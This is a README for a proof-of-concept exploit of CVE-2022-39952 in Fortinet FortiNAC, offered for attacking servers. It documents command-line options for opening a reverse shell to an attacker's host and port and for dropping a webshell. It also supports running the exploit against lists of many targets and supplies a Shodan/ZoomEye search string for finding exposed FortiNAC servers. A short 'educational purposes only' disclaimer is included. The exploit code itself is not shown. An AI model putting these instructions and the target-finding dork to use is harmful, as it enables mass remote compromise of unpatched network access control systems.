# FortiNAC CVE-2022-39952

## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](, with additional options for targeting multiple hosts.

> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.

## Usage:

usage: [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell

To use this exploit, you must have Python 3.x installed on your system.

## Requirements:
    Python 3.x
    requests module
    concurrent.futures module

## Examples:

### Execute a reverse shell on a single target:
$ python -t -lh -lp 4444

### Execute a webshell on a single target:
$ python -t

### Execute a webshell on multiple targets from a list:
$ python -l targets.txt

## Note:

>This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:

`title:"FortiNAC" +"JSESSIONID"`